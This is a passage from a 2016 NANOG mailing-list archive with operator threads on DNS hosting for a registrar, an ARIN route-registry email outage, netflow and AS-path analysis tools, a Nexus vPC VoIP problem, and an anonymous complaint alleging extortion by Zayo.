-0700 Subject: CAIDA selected by FCC for internet performance measurement Message-ID: <20160812145849.79A62E48@m0087792.ppops.net> --- morrowc.lists at gmail.com wrote: From: Christopher Morrow isn't this what KC presented like 3 nanogs ago? ---------------------------------------------- For the archives: https://www.nanog.org/sites/default/files/caida.pdf ----------------------------------- Sorry, one more email. 
Better link: http://nanog.org/meetings/nanog66/agenda Tuesday, February 9 2016 2:30pm - 3:30pm Keynote: Internet Measurement Speakers: k claffy, CAIDA David Clark, MIT Geoff Huston, APNIC scott From rubensk at gmail.com Fri Aug 12 22:46:47 2016 From: rubensk at gmail.com (Rubens Kuhl) Date: Fri, 12 Aug 2016 19:46:47 -0300 Subject: DNS Services for a registrar In-Reply-To: References: Message-ID: On Fri, Aug 12, 2016 at 3:28 PM, Filip Hruska wrote: > Hi, > > If you are going the IaaS route, definitely checkout KnotDNS project. > According to their benchmarks [1], it does much better than other DNS > servers in about every workload. > > The problem with KnotDNS/Yadifa/NSD is that they are too optimized for servers with a small number of zones containing large numbers of records, usually delegation-only. That is the use of TLD registries, but not the use case of registrars... ... all those 3 are getting better in supporting large number of zones with small number of records, but the canonical solution in that space is Power DNS. Things that TLDs usually don't like, SQL-backend for instance, makes perfect sense for this use case. Note that the only workload they tested is serving the root zone, not multiple number of zones with variable number of RR-sets... so aligning the testing with the actual use case is crucial to make good decisions. What I strongly support, though, is getting out of the BIND comfort zone. Rubens From marka at isc.org Fri Aug 12 23:09:23 2016 From: marka at isc.org (Mark Andrews) Date: Sat, 13 Aug 2016 09:09:23 +1000 Subject: DNS Services for a registrar In-Reply-To: Your message of "Fri, 12 Aug 2016 19:46:47 -0300." References: Message-ID: <20160812230923.9EA5150A53A2@rock.dv.isc.org> In message , Rubens Kuhl writes: > On Fri, Aug 12, 2016 at 3:28 PM, Filip Hruska wrote: > > > Hi, > > > > If you are going the IaaS route, definitely checkout KnotDNS project. 
> > According to their benchmarks [1], it does much better than other DNS > > servers in about every workload. > > > > > The problem with KnotDNS/Yadifa/NSD is that they are too optimized for > servers with a small number of zones containing large numbers of records, > usually delegation-only. That is the use of TLD registries, but not the use > case of registrars... > > ... all those 3 are getting better in supporting large number of zones with > small number of records, but the canonical solution in that space is Power > DNS. Things that TLDs usually don't like, SQL-backend for instance, makes > perfect sense for this use case. > > Note that the only workload they tested is serving the root zone, not > multiple number of zones with variable number of RR-sets... so aligning the > testing with the actual use case is crucial to make good decisions. > > What I strongly support, though, is getting out of the BIND comfort zone. Named will support millions of zones and they don't need to be listed in named.conf. BIND 9.11 supports catalog zone which is a meta zone which says what zones the server should configure itself for and where to transfer those zones from, etc. Mark -- Mark Andrews, ISC 1 Seymour St., Dundas Valley, NSW 2117, Australia PHONE: +61 2 9871 4742 INTERNET: marka at isc.org From mehmet at akcin.net Sat Aug 13 02:07:03 2016 From: mehmet at akcin.net (Mehmet Akcin) Date: Fri, 12 Aug 2016 19:07:03 -0700 Subject: DNS Services for a registrar In-Reply-To: <20160812230923.9EA5150A53A2@rock.dv.isc.org> References: <20160812230923.9EA5150A53A2@rock.dv.isc.org> Message-ID: On a serious note, what are the providers out there that can do a decent secondary dns hosting service?. looks like a lot of people stopped offering this service for bulk amount of domains at reasonable price. 
Let's say (100K domains) mehmet On Fri, Aug 12, 2016 at 4:09 PM, Mark Andrews wrote: > > In message mail.gmail.com> > , Rubens Kuhl writes: > > On Fri, Aug 12, 2016 at 3:28 PM, Filip Hruska wrote: > > > > > Hi, > > > > > > If you are going the IaaS route, definitely checkout KnotDNS project. > > > According to their benchmarks [1], it does much better than other DNS > > > servers in about every workload. > > > > > > > > The problem with KnotDNS/Yadifa/NSD is that they are too optimized for > > servers with a small number of zones containing large numbers of records, > > usually delegation-only. That is the use of TLD registries, but not the > use > > case of registrars... > > > > ... all those 3 are getting better in supporting large number of zones > with > > small number of records, but the canonical solution in that space is > Power > > DNS. Things that TLDs usually don't like, SQL-backend for instance, makes > > perfect sense for this use case. > > > > Note that the only workload they tested is serving the root zone, not > > multiple number of zones with variable number of RR-sets... so aligning > the > > testing with the actual use case is crucial to make good decisions. > > > > What I strongly support, though, is getting out of the BIND comfort zone. > > Named will support millions of zones and they don't need to be > listed in named.conf. BIND 9.11 supports catalog zone which is a > meta zone which says what zones the server should configure itself > for and where to transfer those zones from, etc. 
> > Mark > -- > Mark Andrews, ISC > 1 Seymour St., Dundas Valley, NSW 2117, Australia > PHONE: +61 2 9871 4742 INTERNET: marka at isc.org > From damian at google.com Sat Aug 13 02:58:25 2016 From: damian at google.com (Damian Menscher) Date: Fri, 12 Aug 2016 19:58:25 -0700 Subject: DNS Services for a registrar In-Reply-To: References: <20160812230923.9EA5150A53A2@rock.dv.isc.org> Message-ID: On Fri, Aug 12, 2016 at 7:07 PM, Mehmet Akcin wrote: > On a serious note, what are the providers out there that can do a decent > secondary dns hosting service?. looks like a lot of people stopped offering > this service for bulk amount of domains at reasonable price. Let's say > (100K domains) > What do you consider a reasonable price? As a starting point for discussion, Google Cloud DNS can host 100k zones for ~$3700/month ( https://cloud.google.com/dns/pricing). Damian From cb.list6 at gmail.com Sat Aug 13 03:09:05 2016 From: cb.list6 at gmail.com (Ca By) Date: Fri, 12 Aug 2016 20:09:05 -0700 Subject: DNS Services for a registrar In-Reply-To: References: <20160812230923.9EA5150A53A2@rock.dv.isc.org> Message-ID: On Friday, August 12, 2016, Damian Menscher via NANOG wrote: > On Fri, Aug 12, 2016 at 7:07 PM, Mehmet Akcin > wrote: > > > On a serious note, what are the providers out there that can do a decent > > secondary dns hosting service?. looks like a lot of people stopped > offering > > this service for bulk amount of domains at reasonable price. Let's say > > (100K domains) > > > > What do you consider a reasonable price? As a starting point for > discussion, Google Cloud DNS can host 100k zones for ~$3700/month ( > https://cloud.google.com/dns/pricing). > > Damian > But google does not do an axfr based secondary? This is a very important service that Mehmet mentioned. 
From daknob.mac at gmail.com Fri Aug 12 12:50:55 2016 From: daknob.mac at gmail.com (DaKnOb) Date: Fri, 12 Aug 2016 15:50:55 +0300 Subject: DNS Services for a registrar In-Reply-To: References: Message-ID:

Someone registered the domain "corp.gr" and now sells subdomains similar to .com.gr, .co.uk, etc. They use a "clever" way to make sure they will have 100% uptime at virtually no cost:

$ dig NS corp.gr
;; Truncated, retrying in TCP mode.

; <<>> DiG 9.8.3-P1 <<>> NS corp.gr
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 47495
;; flags: qr rd ra; QUERY: 1, ANSWER: 28, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;corp.gr. IN NS

;; ANSWER SECTION:
corp.gr. 21599 IN NS puck.nether.net.
corp.gr. 21599 IN NS ns4.dnsunlimited.com.
corp.gr. 21599 IN NS i.ns.buddyns.com.
corp.gr. 21599 IN NS d.ns.zerigo.net.
corp.gr. 21599 IN NS f.ns.zerigo.net.
corp.gr. 21599 IN NS b.nskey.com.
corp.gr. 21599 IN NS g.ns.buddyns.com.
corp.gr. 21599 IN NS ns4.he.net.
corp.gr. 21599 IN NS ns5.dnsunlimited.com.
corp.gr. 21599 IN NS f.ns.buddyns.com.
corp.gr. 21599 IN NS h.ns.buddyns.com.
corp.gr. 21599 IN NS d.ns.buddyns.com.
corp.gr. 21599 IN NS ns2.he.net.
corp.gr. 21599 IN NS ns2.afraid.org.
corp.gr. 21599 IN NS a.nskey.com.
corp.gr. 21599 IN NS b.ns.zerigo.net.
corp.gr. 21599 IN NS b.ns.buddyns.com.
corp.gr. 21599 IN NS e.ns.buddyns.com.
corp.gr. 21599 IN NS ns1.dnsunlimited.com.
corp.gr. 21599 IN NS c.ns.zerigo.net.
corp.gr. 21599 IN NS c.ns.buddyns.com.
corp.gr. 21599 IN NS ns3.dnsunlimited.com.
corp.gr. 21599 IN NS a.ns.zerigo.net.
corp.gr. 21599 IN NS ns5.he.net.
corp.gr. 21599 IN NS ns2.dnsunlimited.com.
corp.gr. 21599 IN NS ns1.twisted4life.com.
corp.gr. 21599 IN NS e.ns.zerigo.net.
corp.gr. 21599 IN NS ns3.he.net.

;; Query time: 161 msec
;; SERVER: 8.8.8.8#53(8.8.8.8)
;; WHEN: Fri Aug 12 14:42:58 2016
;; MSG SIZE rcvd: 577

Of course, I don't recommend you do this. On a serious note, as mentioned previously, AWS lacks IPv6 currently.
A custom solution would provide more control but it may have some challenges. In addition to that, you'd probably need some form of network redundancy but you're most likely not going to reach AWS' anycasted network's availability easily. I'd recommend looking to some other providers as well, some of which may be in the list of name servers above. Just my 2c > On 12 Aug 2016, at 08:56, Ryan Finnesey wrote: > > We need to provide DNS services for domains we offer as a registrar. We were discussing internally the different options for the deployment. Does anyone see a down side to using IaaS on AWS and Azure? > > We were also kicking around the idea of a PaaS offering and using Azure DNS or AWS Route 53. > > Cheers > Ryan > From eli at siliconsprawl.com Fri Aug 12 14:43:21 2016 From: eli at siliconsprawl.com (Eli Lindsey) Date: Fri, 12 Aug 2016 10:43:21 -0400 Subject: DNS Services for a registrar In-Reply-To: References: Message-ID: From the speed comparison report: "Averaged across all name servers" That's a silly, synthetic, and non-representative test. It encourages cohosting all your NS at all your sites to game the performance numbers, hurting availability. I'd expect to see a decent amount of latency variance across the NS in a given delegation because I want them to get anycasted to different transit/physical locations, and I would also expect that not to translate into notable user-perceived latency due to resolver's server selection logic. -eli On Fri, Aug 12, 2016 at 9:41 AM, Peter Beckman wrote: > I highly recommend DNS Made Easy. Super fast, extremely reliable (100% up > time in the last 10-12 years excluding an 8 hour period 4-5 years ago where > they got DDOSed, no issues since), very affordable. > > #2 fastest for July: http://www.solvedns.com/dns-comparison/2016/07 > > Has been #1 several months this year. > > Beckman > > > On Fri, 12 Aug 2016, Ryan Finnesey wrote: > > We need to provide DNS services for domains we offer as a registrar.
We >> were discussing internally the different options for the deployment. Does >> anyone see a down side to using IaaS on AWS and Azure? >> >> We were also kicking around the idea of a PaaS offering and using Azure >> DNS or AWS Route 53. >> >> Cheers >> Ryan >> >> >> > ------------------------------------------------------------ > --------------- > Peter Beckman Internet Guy > beckman at angryox.com > http://www.angryox.com/ > ------------------------------------------------------------ > --------------- > From daknob.mac at gmail.com Fri Aug 12 15:44:42 2016 From: daknob.mac at gmail.com (DaKnOb) Date: Fri, 12 Aug 2016 18:44:42 +0300 Subject: DNS Services for a registrar In-Reply-To: <2241B24E-46BF-4921-80CD-1D3F29945077@neilltech.com> References: <0DE520AE-8CF6-4140-9DA6-4D90DF66A375@thrashyour.com> <2241B24E-46BF-4921-80CD-1D3F29945077@neilltech.com> Message-ID: > On 12 Aug 2016, at 18:36, Keith Stokes wrote: > > Route53 can get expensive for lots of domains. Queries are cheap with the first 1M free, but if you have 1000 domains you'll pay $500/month. > > You can build dedicated servers in multiple AZs and data centers able to handle that many domains for far less. I'd also recommend multiple providers as well if you're getting dedicated servers so you can avoid non-technical provider-based issues. > > You might also consider running dedicated servers in each of AWS and Azure to avoid a single-provider failure. > > On Aug 12, 2016, at 9:44 AM, John Kinsella > wrote: > > Also a big fan of DNS Made easy, but I wish they'd add DNSSEC already. > > I'm happy with AWS - one thing to consider is model out the network costs. That seems to get some people, who just expect the bill for instances at end of month.
If you're worried about availability due to an availability zone going down, ensure you have the service replicated across multiple AZs or regions and > > It might be worth a few minutes pondering just using Amazon's Route53 instead of running the DNS server yourself. I haven't looked at how the cost compares. > > On Aug 12, 2016, at 6:41 AM, Peter Beckman > wrote: > > I highly recommend DNS Made Easy. Super fast, extremely reliable (100% up > time in the last 10-12 years excluding an 8 hour period 4-5 years ago where > they got DDOSed, no issues since), very affordable. > > #2 fastest for July: http://www.solvedns.com/dns-comparison/2016/07 > > Has been #1 several months this year. > > Beckman > > On Fri, 12 Aug 2016, Ryan Finnesey wrote: > > We need to provide DNS services for domains we offer as a registrar. We were discussing internally the different options for the deployment. Does anyone see a down side to using IaaS on AWS and Azure? > > We were also kicking around the idea of a PaaS offering and using Azure DNS or AWS Route 53. > > Cheers > Ryan > > > > --------------------------------------------------------------------------- > Peter Beckman Internet Guy > beckman at angryox.com http://www.angryox.com/ > --------------------------------------------------------------------------- > > > > --- > > Keith Stokes > > > > From matthieu at nxdomain.fr Fri Aug 12 17:34:20 2016 From: matthieu at nxdomain.fr (Matthieu Michaud) Date: Fri, 12 Aug 2016 19:34:20 +0200 Subject: DNS Services for a registrar In-Reply-To: References: Message-ID: Hi, I have been very happy with route53 while lack of IPv6 support was not an issue for the use case. Did you evaluate CloudFlare in PaaS solution ? Their free plan includes DNS. Best regards, On Fri, Aug 12, 2016 at 7:56 AM, Ryan Finnesey wrote: > We need to provide DNS services for domains we offer as a registrar. We > were discussing internally the different options for the deployment.
Does > anyone see a down side to using IaaS on AWS and Azure? > > We were also kicking around the idea of a PaaS offering and using Azure > DNS or AWS Route 53. > > Cheers > Ryan > > -- Matthieu MICHAUD From mehmet at akcin.net Sat Aug 13 03:12:10 2016 From: mehmet at akcin.net (Mehmet Akcin) Date: Fri, 12 Aug 2016 20:12:10 -0700 Subject: DNS Services for a registrar In-Reply-To: References: <20160812230923.9EA5150A53A2@rock.dv.isc.org> Message-ID: Good point ;) Yeah axfr would be useful (must have) On Saturday, August 13, 2016, Ca By wrote: > > > On Friday, August 12, 2016, Damian Menscher via NANOG > wrote: > >> On Fri, Aug 12, 2016 at 7:07 PM, Mehmet Akcin wrote: >> >> > On a serious note, what are the providers out there that can do a decent >> > secondary dns hosting service?. looks like a lot of people stopped >> offering >> > this service for bulk amount of domains at reasonable price. Let's say >> > (100K domains) >> > >> >> What do you consider a reasonable price? As a starting point for >> discussion, Google Cloud DNS can host 100k zones for ~$3700/month ( >> https://cloud.google.com/dns/pricing). >> >> Damian >> > > But google does not do an axfr based secondary? > > This is a very important service that Mehmet mentioned. > From jared at puck.Nether.net Sat Aug 13 12:05:11 2016 From: jared at puck.Nether.net (Jared Mauch) Date: Sat, 13 Aug 2016 08:05:11 -0400 Subject: DNS Services for a registrar In-Reply-To: References: Message-ID: <20160813120511.GA8026@puck.nether.net> On Fri, Aug 12, 2016 at 03:50:55PM +0300, DaKnOb wrote: > Someone registered the domain ?corp.gr? and now sells subdomains similar to .com.gr, .co.uk, etc. They use a ?clever? way to make sure they will have 100% uptime at virtually no cost: > heh. amusing. surprised they don't have esgob in there too. but seriously, look at the anycast on a shoestring presentation from nat morris. There are a lot of ways to skin this cat. 
I've been meaning to respin a variant of my service for a few years now, maybe it's time to do it. - jared -- Jared Mauch | pgp key available via finger from jared at puck.nether.net clue++; | http://puck.nether.net/~jared/ My statements are only mine. From ESundberg at nitelusa.com Sat Aug 13 18:42:36 2016 From: ESundberg at nitelusa.com (Erik Sundberg) Date: Sat, 13 Aug 2016 18:42:36 +0000 Subject: ARIN Route Registry Issue In-Reply-To: References: Message-ID: I am having some issues with ARIN Route Registry email not responding to emails that I am sending. I sent 3 emails on friday to rr at arin.net with no response. Wondering if any one is having the same issue or if anyone from ARIn can chime in. I have opened a ticket with ARIN but its the weekend. Erik Sundberg Sr. Network Engineer Nitel 1101 West Lake Street,6th Fl Chicago, IL 60607 Desk: 773-661-5532 Cell: 708-710-7419 NOC 24/7: 866-892-0915 Email: esundberg at nitelusa.com http://www.nitelusa.com ________________________________ CONFIDENTIALITY NOTICE: This e-mail transmission, and any documents, files or previous e-mail messages attached to it may contain confidential information that is legally privileged. If you are not the intended recipient, or a person responsible for delivering it to the intended recipient, you are hereby notified that any disclosure, copying, distribution or use of any of the information contained in or attached to this transmission is STRICTLY PROHIBITED. If you have received this transmission in error please notify the sender immediately by replying to this e-mail. You must destroy the original transmission and its attachments without reading or saving in any manner. Thank you. From frnkblk at iname.com Sat Aug 13 20:12:28 2016 From: frnkblk at iname.com (frnkblk at iname.com) Date: Sat, 13 Aug 2016 15:12:28 -0500 Subject: ARIN Route Registry Issue In-Reply-To: References: Message-ID: <000e01d1f59f$04a59260$0df0b720$@iname.com> They are moving offices. 
https://www.arin.net/announcements/2016/20160804.html Frank -----Original Message----- From: NANOG [mailto:nanog-bounces at nanog.org] On Behalf Of Erik Sundberg Sent: Saturday, August 13, 2016 1:43 PM To: nanog at nanog.org Subject: ARIN Route Registry Issue I am having some issues with ARIN Route Registry email not responding to emails that I am sending. I sent 3 emails on friday to rr at arin.net with no response. Wondering if any one is having the same issue or if anyone from ARIn can chime in. I have opened a ticket with ARIN but its the weekend. Erik Sundberg Sr. Network Engineer Nitel 1101 West Lake Street,6th Fl Chicago, IL 60607 Desk: 773-661-5532 Cell: 708-710-7419 NOC 24/7: 866-892-0915 Email: esundberg at nitelusa.com http://www.nitelusa.com From randy at psg.com Sat Aug 13 22:30:22 2016 From: randy at psg.com (Randy Bush) Date: Sun, 14 Aug 2016 07:30:22 +0900 Subject: ARIN Route Registry Issue In-Reply-To: <000e01d1f59f$04a59260$0df0b720$@iname.com> References: <000e01d1f59f$04a59260$0df0b720$@iname.com> Message-ID: > They are moving offices. > https://www.arin.net/announcements/2016/20160804.html "All other customer support business systems (website, email, ARIN Online, RESTful Provisioning, Whois, RDAP, IRR, RPKI repository, etc.)
will remain operational during the move." From sryan at arbor.net Sat Aug 13 22:33:11 2016 From: sryan at arbor.net (Ryan, Spencer) Date: Sat, 13 Aug 2016 22:33:11 +0000 Subject: ARIN Route Registry Issue In-Reply-To: References: <000e01d1f59f$04a59260$0df0b720$@iname.com>, Message-ID: <0c1wd450n6f068aev7b3h5ey.1471127590087@email.android.com> It says email will be online. Not that anyone will be there to answer them. Sent from my Verizon, Samsung Galaxy smartphone -------- Original message -------- From: Randy Bush Date: 8/13/16 6:30 PM (GMT-05:00) To: Frank Bulk Cc: North American Network Operators' Group Subject: Re: ARIN Route Registry Issue > They are moving offices. > https://www.arin.net/announcements/2016/20160804.html "All other customer support business systems (website, email, ARIN Online, RESTful Provisioning, Whois, RDAP, IRR, RPKI repository, etc.) will remain operational during the move." From randy at psg.com Sat Aug 13 22:40:21 2016 From: randy at psg.com (Randy Bush) Date: Sun, 14 Aug 2016 07:40:21 +0900 Subject: ARIN Route Registry Issue In-Reply-To: <0c1wd450n6f068aev7b3h5ey.1471127590087@email.android.com> References: <000e01d1f59f$04a59260$0df0b720$@iname.com> Message-ID: > It says email will be online. Not that anyone will be there to answer them. >> They are moving offices. >> https://www.arin.net/announcements/2016/20160804.html > > "All other customer support business systems (website, email, ARIN > Online, RESTful Provisioning, Whois, RDAP, IRR, RPKI repository, etc.) > will remain operational during the move." 
the op was reporting a problem with email-based irr updated randy From jcurran at arin.net Sat Aug 13 23:12:02 2016 From: jcurran at arin.net (John Curran) Date: Sat, 13 Aug 2016 23:12:02 +0000 Subject: ARIN Route Registry Issue In-Reply-To: References: Message-ID: <639C5CB3-A20C-4BBB-9ABA-B0BC866BB5FA@arin.net> On Aug 13, 2016, at 12:42 PM, Erik Sundberg wrote: > > I am having some issues with ARIN Route Registry email not responding to emails that I am sending. > > I sent 3 emails on friday to rr at arin.net with no response. > > Wondering if any one is having the same issue or if anyone from ARIn can chime in. I have opened a ticket with ARIN but its the weekend. Erik - Our apologies - apparently there was an error that had RR email going to our HQ email servers (which are no longer present) rather than via smtp relay in the public-facing colocation sites. This has been since fixed, and the email queues flushed - i.e. you should have your responses at this time. (If this is not the case, please let me know asap.) Thanks! (and again apologizes for the glitch) /John John Curran President and CEO ARIN From ESundberg at nitelusa.com Sat Aug 13 23:42:22 2016 From: ESundberg at nitelusa.com (Erik Sundberg) Date: Sat, 13 Aug 2016 23:42:22 +0000 Subject: ARIN Route Registry Issue In-Reply-To: <639C5CB3-A20C-4BBB-9ABA-B0BC866BB5FA@arin.net> References: , <639C5CB3-A20C-4BBB-9ABA-B0BC866BB5FA@arin.net> Message-ID: John, I started to receive emails back from rr at arin.net. Thanks for looking at this. Good luck with the move. Erik Sundberg Sr. Network Engineer Nitel 1101 West Lake Street,6th Fl Chicago, IL 60607 Desk: 773-661-5532 Cell: 708-710-7419 NOC 24/7: 866-892-0915 Email: esundberg at nitelusa.com http://www.nitelusa.com > On Aug 13, 2016, at 7:13 PM, John Curran wrote: > >> On Aug 13, 2016, at 12:42 PM, Erik Sundberg wrote: >> >> I am having some issues with ARIN Route Registry email not responding to emails that I am sending. 
>> >> I sent 3 emails on friday to rr at arin.net with no response. >> >> Wondering if any one is having the same issue or if anyone from ARIn can chime in. I have opened a ticket with ARIN but its the weekend. > > > Erik - > > Our apologies - apparently there was an error that had RR email going to > our HQ email servers (which are no longer present) rather than via smtp > relay in the public-facing colocation sites. This has been since fixed, and > the email queues flushed - i.e. you should have your responses at this time. > (If this is not the case, please let me know asap.) > > Thanks! (and again apologizes for the glitch) > /John > > John Curran > President and CEO > ARIN > From ESundberg at nitelusa.com Sun Aug 14 04:00:20 2016 From: ESundberg at nitelusa.com (Erik Sundberg) Date: Sun, 14 Aug 2016 04:00:20 +0000 Subject: ARIN Route Registry Issue In-Reply-To: <639C5CB3-A20C-4BBB-9ABA-B0BC866BB5FA@arin.net> References: <639C5CB3-A20C-4BBB-9ABA-B0BC866BB5FA@arin.net> Message-ID: <495D0934DA46854A9CA758393724D590455C5487@NI-MAIL02.nii.ads> Verified it's backup and working again with immediate responses. Erik Sundberg Sr. Network Engineer p: 773.661.5532 c: 708.274.7419 NOC: 866.892.0915 1101 W.
Lake Street, 6th Floor | Chicago, IL 60607 esundberg at nitelusa.com | www.nitelusa.com Managed Telecom Services MPLS | Ethernet | Private Line | Internet | Voice -----Original Message----- From: John Curran [mailto:jcurran at arin.net] Sent: Saturday, August 13, 2016 6:12 PM To: Erik Sundberg Cc: nanog at nanog.org Subject: Re: ARIN Route Registry Issue On Aug 13, 2016, at 12:42 PM, Erik Sundberg wrote: > > I am having some issues with ARIN Route Registry email not responding to emails that I am sending. > > I sent 3 emails on friday to rr at arin.net with no response. > > Wondering if any one is having the same issue or if anyone from ARIn can chime in. I have opened a ticket with ARIN but its the weekend. Erik - Our apologies - apparently there was an error that had RR email going to our HQ email servers (which are no longer present) rather than via smtp relay in the public-facing colocation sites. This has been since fixed, and the email queues flushed - i.e. you should have your responses at this time. (If this is not the case, please let me know asap.) Thanks! (and again apologizes for the glitch) /John John Curran President and CEO ARIN
From randy at psg.com Mon Aug 15 08:40:40 2016 From: randy at psg.com (Randy Bush) Date: Mon, 15 Aug 2016 10:40:40 +0200 Subject: netflow + as path = buildout decision Message-ID: my poor memory says that, some years back, someone announced or mentioned an open tool which i, a small isp, could feed my netflow data and bgp and ask if i should peer with X or build out or ... anyone with a more precise memory than i? randy From chip.gwyn at gmail.com Mon Aug 15 09:01:29 2016 From: chip.gwyn at gmail.com (chip) Date: Mon, 15 Aug 2016 05:01:29 -0400 Subject: netflow + as path = buildout decision In-Reply-To: References: Message-ID: likely pmacct. http://www.pmacct.net It works quite well to augment or replace ASPath data from the router. --chip On Monday, August 15, 2016, Randy Bush wrote: > my poor memory says that, some years back, someone announced or > mentioned an open tool which i, a small isp, could feed my netflow data > and bgp and ask if i should peer with X or build out or ... > > anyone with a more precise memory than i? > > randy > -- Just my $.02, your mileage may vary, batteries not included, etc.... From job at instituut.net Mon Aug 15 09:07:40 2016 From: job at instituut.net (Job Snijders) Date: Mon, 15 Aug 2016 11:07:40 +0200 Subject: netflow + as path = buildout decision In-Reply-To: References: Message-ID: <20160815090740.GA1268@vurt.meerval.net> On Mon, Aug 15, 2016 at 10:40:40AM +0200, Randy Bush wrote: > my poor memory says that, some years back, someone announced or > mentioned an open tool which i, a small isp, could feed my netflow data > and bgp and ask if i should peer with X or build out or ... > > anyone with a more precise memory than i? 
Maybe one of these: o Powertool without frontend: http://pmacct.net/ o Comes with more eye-candy https://github.com/manuelkasper/AS-Stats Kind regards, Job From ask at develooper.com Sat Aug 13 08:13:26 2016 From: ask at develooper.com (Ask Bjørn Hansen) Date: Sat, 13 Aug 2016 01:13:26 -0700 Subject: DNS Services for a registrar In-Reply-To: References: Message-ID: <50E37DE8-E8F5-47D0-B28D-E6A91B65DB0D@develooper.com> > On Aug 11, 2016, at 22:56, Ryan Finnesey wrote: > > We need to provide DNS services for domains we offer as a registrar. > We were discussing internally the different options for the deployment. Does anyone see a down side to using IaaS on AWS and Azure? No anycast. > We were also kicking around the idea of a PaaS offering and using Azure DNS or AWS Route 53. https://www.pch.net/services/dns_anycast Ask From honorethics at yahoo.com Sat Aug 13 16:50:46 2016 From: honorethics at yahoo.com (HonorFirst Name Ethics) Date: Sat, 13 Aug 2016 16:50:46 +0000 (UTC) Subject: Zayo Extortion References: <1000746.4425928.1471107046018.JavaMail.yahoo.ref@mail.yahoo.com> Message-ID: <1000746.4425928.1471107046018.JavaMail.yahoo@mail.yahoo.com> Question to the NANOG community, Is anyone else being extorted by Zayo? Is Zayo threatening shutdown over bogus and fabricated charges? The purpose of this message to the group is twofold: 1) to share our experience being extorted by Zayo with the community and 2) to understand the depth and extent of Zayo's less than ethical behavior by getting feedback from the community. Abovenet was a great organization with quality service, reasonable prices and nice folks to work with. Since being acquired by Zayo we have seen a significant degradation of service quality and responsiveness which is not unusual from a provider, but Zayo has taken things to a level of low ethics that would make Tony Soprano proud.
Most interestingly they seem to identify points where you are dependent on them and threaten a shut down unless you pay them some arbitrary amount. In our case we use multiple Zayo IP, Transport, and Colo Services -- they set their extortion amount at $128,000. A completely arbitrary and fabricated number. They put significant pressure threatening to shut us down by setting their lawyers on us. Our detailed contract breakdowns, invoice and payment spreadsheets, along with all other commonsense and professional efforts were simply disregarded. At one point their lawyers and accounting people had the nerve to say "our accounting system does not track invoice details -- it only shows the total amount due so your numbers mean nothing to us." All the while they relentlessly levied disconnect threats with short timelines such as: "if you don't pay us $128,000 by this Friday, we will shut your operation down." We have had anecdotal feedback that we are not alone in our experience and that there are many more like us. If you and your company have had a similar experience with Zayo, please share it with the group or if like us you are concerned about retaliation from Zayo, please respond privately. If the group shares their experiences the public shaming may drive Zayo to stop operating like mafia thugs. If the problem is as common as we suspect, it may warrant getting the Attorney General involved. In the meantime, I strongly urge anyone already in a relationship with Zayo or considering a relationship to make sure you are well diversified with other more ethical carriers. Otherwise please consider another organization to work with. In our case we were better off with Ransomware, than Zayo as a vendor!
It's cheaper and less damaging A Zayo victim and a NANOG Member From ndavis at arin.net Sat Aug 13 19:50:14 2016 From: ndavis at arin.net (Nate Davis) Date: Sat, 13 Aug 2016 19:50:14 +0000 Subject: ARIN Route Registry Issue In-Reply-To: References: Message-ID: Erik - I've reached out to you off-list. Regards, Nate Davis Chief Operating Officer American Registry for Internet Numbers On 8/13/16, 2:42 PM, "NANOG on behalf of Erik Sundberg" wrote: >I am having some issues with ARIN Route Registry email not responding to >emails that I am sending. > >I sent 3 emails on Friday to rr at arin.net with no >response. > >Wondering if anyone is having the same issue or if anyone from ARIN can >chime in. I have opened a ticket with ARIN but it's the weekend. > > >Erik Sundberg >Sr. Network Engineer >Nitel >1101 West Lake Street,6th Fl >Chicago, IL 60607 >Desk: 773-661-5532 >Cell: 708-710-7419 >NOC 24/7: 866-892-0915 >Email: esundberg at nitelusa.com >http://www.nitelusa.com > > >________________________________ > >CONFIDENTIALITY NOTICE: This e-mail transmission, and any documents, >files or previous e-mail messages attached to it may contain confidential >information that is legally privileged. If you are not the intended >recipient, or a person responsible for delivering it to the intended >recipient, you are hereby notified that any disclosure, copying, >distribution or use of any of the information contained in or attached to >this transmission is STRICTLY PROHIBITED. If you have received this >transmission in error please notify the sender immediately by replying to >this e-mail. You must destroy the original transmission and its >attachments without reading or saving in any manner. Thank you. From sathish.kumar.ippani at gmail.com Sun Aug 14 21:59:07 2016 From: sathish.kumar.ippani at gmail.com (sathish kumar Ippani) Date: Mon, 15 Aug 2016 03:29:07 +0530 Subject: Cisco Nexus vPC-VOIP Issues Message-ID: Hello All, Thank you all in advance.
We have connected two nexus 3048 Switches and two l2 Switches as below using vPC and LACP. We have not seen any issues apart from one of VOIP server connected to Switch 1 has lost access to VOIP Server connected Switch 2 and vice versa. Where I am able to ping both from Global. Can you please let me know what went wrong here. [image: Inline image 2] -- With Regards, Sathish Kumar Ippani 9177166040 From remy at true.nl Mon Aug 15 08:50:09 2016 From: remy at true.nl (Remy de Boer / True) Date: Mon, 15 Aug 2016 08:50:09 +0000 Subject: netflow + as path = buildout decision In-Reply-To: References: Message-ID: <3E6C7FD3-02D9-49C5-8248-520BFB9BE2A8@true.nl> This one doesn't peer with your BGP, but sounds pretty close for the rest: https://github.com/manuelkasper/AS-Stats > On 15 Aug 2016, at 10:40, Randy Bush wrote: > > my poor memory says that, some years back, someone announced or > mentioned an open tool which i, a small isp, could feed my netflow data > and bgp and ask if i should peer with X or build out or ... > > anyone with a more precise memory than i? > > randy From nanog at lodpp.net Mon Aug 15 10:23:37 2016 From: nanog at lodpp.net (nico nanog) Date: Mon, 15 Aug 2016 12:23:37 +0200 Subject: Cisco Nexus vPC-VOIP Issues In-Reply-To: References: Message-ID: <39495a84-08b6-5b77-5c5b-d15f5a77b565@lodpp.net> Hello, I cannot see any image in attachment. If you can ping from outside and not between them, wild guess it's not a L2 pbm. Are you able to see the arp of srv2 from srv1 ( and vice-versa ) Without more info ( or it's maybe on the image I cannot see ) I would look in ACL somewhere/firewall on srv Rgd, Nico On 08/14/2016 11:59 PM, sathish kumar Ippani wrote: > Hello All, > > Thank you all in advance.
